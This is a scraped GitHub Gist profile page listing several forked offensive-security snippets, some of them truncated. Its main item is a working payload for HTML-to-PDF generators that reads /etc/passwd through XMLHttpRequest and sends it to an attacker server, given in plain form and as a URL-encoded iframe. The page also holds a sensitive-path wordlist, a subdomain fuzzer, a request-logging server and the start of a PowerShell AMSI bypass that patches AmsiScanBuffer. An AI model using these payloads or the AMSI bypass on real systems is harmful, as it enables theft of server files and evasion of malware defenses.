Skip to content

Instantly share code, notes, and snippets.

View Leoid's full-sized avatar
:octocat:
Sharpening my axe

#B1twis3 Leoid

:octocat:
Sharpening my axe
View GitHub Profile
@Leoid
Leoid / poc.md
Created March 28, 2019 04:34 — forked from lc/poc.md
xhr to steal local files in HTML2PDF generators
x=new XMLHttpRequest;x.onload=function(){l=new XMLHttpRequest;l.open("GET","http://<ATTACKER-SERVER>:1337/"+encodeURIComponent(this.responseText));l.send();};x.open("GET","file:///etc/passwd");x.send();
<iframe src="javascript:%78%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%78%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%6c%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%68%74%74%70%3a%2f%2f%78%2e%78%78%65%2e%73%68%3a%31%33%33%37%2f%22%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%29%3b%6c%2e%73%65%6e%64%28%29%3b%7d%3b%78%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%29%3b%78%2e%73%65%6e%64%28%29%3b%0a"></iframe>
/.DS_Store
/.git
/.svn
/.wp-config.php.swp
/2
/Search-Replace-DB-master/
/Search-Replace-DB/
/Trace.axd
/WEB-INF/web.xml
/_admin
scope = 'https://fuzz.domain'
wordlist = open('/opt/Tools/commonspeak2-wordlists/subdomains/subdomains.txt').read().split('\n')
for word in range(1,999):
#if not word.strip():
# continue
x = scope.replace('fuzz',str(word))
print(x+'\n')
#print('{}.{}\n'.format(word.strip(), scope))
@Leoid
Leoid / server.py
Created December 5, 2019 14:53 — forked from mdonkers/server.py
Simple Python 3 HTTP server for logging all GET and POST requests
#!/usr/bin/env python3
"""
Very simple HTTP server in python for logging requests
Usage::
./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
class S(BaseHTTPRequestHandler):
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
for i in range(0, self.IFList.getModel().getSize()):
if self.IFList.getModel().getElementAt(i).split(":")[0] == "Ignore spider requests":
if (toolFlag == self._callbacks.TOOL_SPIDER):
return
if self.IFList.getModel().getElementAt(i).split(":")[0] == "Ignore proxy requests":
if (toolFlag == self._callbacks.TOOL_PROXY):
return
if self.IFList.getModel().getElementAt(i).split(":")[0] == "Ignore target requests":
if (toolFlag == self._callbacks.TOOL_TARGET):
# This Script will
# - Get the Address of the "AmsiScanBuffer" function
# - Change the page protection from 0x20 to 0x40 (Read to WriteCopy)
# - Write 0xC3 (Ret Insturction) to the beginning of the AmsiScanBuffer
# - Change back the page protectin from 0x40 to 0x20
$Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {